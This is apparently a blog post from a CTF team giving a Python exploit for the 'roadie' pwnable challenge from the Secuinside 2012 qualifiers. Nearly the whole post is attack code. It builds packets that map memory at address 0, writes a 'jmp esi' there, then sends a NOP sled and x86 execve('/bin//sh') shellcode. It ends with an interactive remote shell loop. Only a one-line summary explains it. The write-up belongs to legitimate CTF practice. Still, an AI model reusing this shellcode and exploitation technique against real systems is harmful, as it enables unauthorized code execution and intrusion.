Category : Pwnables
nickname: roadie
HINT: 61.42.25.26:8080
binary: http://61.42.25.26/roadie
CentOS 6.2 / randomize_va_space 2 / exec-shield 1 |
roadieSummary : chain functions , allocate memory address 0 -> write byte code on memory address 0 -> call memory address 0
#!/usr/bin/python from socket import * from struct import pack , unpack import time , random def d(x): return pack('<l',x) def w(x): return pack('<h',x) def b(x): return pack('<b',x) HOST = "127.0.0.1" PORT = 8383 SHELLCODE = "\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" ############################### CASE call ############################# def gen_call(idx,addr): pSize = 0x244 pList = [] for i in range(pSize / 4): pList.append(d(0)) pList[0] = b(-1) + b(66) + b(66) + b(79) pList[2] = d(0) pList[3] = d(0x00007feb) # "\xeb\x7f" = jmp $ + 0x7f pList[4] = d(0x02000200) pList[5] = d(0x00000100) pList[6] = d(0x00000100) pList[7] = d(0x1234001f) pList[8] = d(0) pList[9] = d(-1) pList[10] = d(3) pList[11] = d(-12) pList[12] = d(0) pList[13] = d(-14) pList[14] = d(0x01090120) pList[15] = d(0) pList[16] = d(0x123) pList[17] = d(0) pList[18] = d(-1) pList[19] = d(0x00000101) pList[20] = d(8) pList[21] = d(8) pList[22] = d(-1) pList[23] = d(0xffff) pList[24] = d(0xffff0000) pList[25] = d(0x00b100a1) pList[26] = d(0x000000c1) pList[27] = d(0x000000d1) pList[28] = d(addr) # function addr pList[29] = d(0) pList[31] = d(0xcccccccc) pList[32] = d(0xdddddddd) pList[33] = d(0x0) pList[34] = d(idx+1) # index of loop payload = "".join(byte for byte in pList) return payload ############################################################################# ############################### CASE mmap ################################### def gen_mmap(idx , idx2 , value): pSize = 0x244 pList = [] for i in range(pSize / 4): pList.append(d(0)) pList[0] = b(-1) + b(66) + b(66) + b(79) pList[2] = d(0x00000000) pList[3] = d(1234) pList[4] = d(0x02000200) pList[5] = d(0x00000100) pList[6] = d(0x00000100) pList[7] = d(0x1234001e) pList[8] = d(0) pList[9] = d(-1) pList[10] = d(3) pList[11] = d(-12) pList[12] = d(0) pList[13] = d(-14) pList[14] = d(0x01090120) pList[15] = d(0) pList[16] = d(0x123) pList[17] = d(-4) pList[18] = d(0) pList[19] = d(0xffffffff) pList[20] = d(idx2) # index of new buffer to overwrite pList[21] = d(0) pList[22] = d(0x01) pList[23] = d(0x02) pList[24] = d(0x03) pList[25] = d(0x04) pList[26] = d(0x05) pList[27] = d(0x06) pList[28] = d(0x07) pList[29] = d(0x08) pList[30] = d(value) # we can write this value pList[39] = d(0x33) pList[72] = d(-40) pList[73] = d(-24) pList[74] = d(-23) pList[75] = d(3) pList[76] = d(0) pList[77] = d(0) pList[78] = d(-126) pList[86] = d(idx+1) # index of loop payload = "".join(byte for byte in pList) return payload ####################### Main Procedure #################################### s = socket(AF_INET , SOCK_STREAM) s.connect((HOST , PORT)) raw_input("gogo?> ") values = [0xff , 0xe6] # jmp esi payload = "" for i in range(0,2): s.send(gen_mmap(i , i , values[i]))
s.send(gen_call(2 , 0x0)[:35*4] + "\x90" * (0x244 - 35 * 4 - len(SHELLCODE)) + SHELLCODE) ############################# Got SHELL ###################################### while 1: cmd = raw_input("$ ") s.send(cmd + "\n") if cmd == "exit": break print s.recv(1024) ############################################################################## s.close() |
'CTF' 카테고리의 다른 글
| Secuinside 2012 Quals Pwnable Chal Exploits (0) | 2012.10.07 |
|---|---|
| Secuinside 2012 Quals - Classico (Exploit only) (0) | 2012.10.07 |
| Secuinside 2012 Quals - Tribute (Exploit only) (0) | 2012.10.07 |
| Secuinside 2012 Quals - Dethstarr (Exploit only) (0) | 2012.10.07 |
| 2011 Holy-Shield Hacking Festival Report (4) | 2011.11.29 |
